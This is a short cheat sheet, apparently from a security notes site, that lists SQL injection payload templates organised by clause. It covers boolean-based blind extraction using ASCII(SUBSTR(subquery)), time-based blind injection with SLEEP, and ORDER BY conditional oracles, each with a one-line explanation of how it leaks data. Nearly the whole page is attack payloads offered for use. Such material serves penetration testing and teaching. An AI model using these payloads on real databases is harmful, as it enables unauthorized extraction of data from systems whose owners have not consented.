Injection by clause
A list of payloads to propperly understand how the injection can be undertaken depending on the clause.
[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y;
[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y AND SLEEP(1337);
[...] WHERE [.] ORDER BY (SELECT (CASE WHEN EXISTS(SUBQUERY) THEN column1 ELSE column2 END));
- Depending on the order of the displayed contents, the subquery would be true or false.
[...] WHERE [.] ORDER BY (SUBQUERY AND sleep(1337));
- The provided seconds to the sleep function would be multiplied to the returning rows of the main query.
Last modified 2yr ago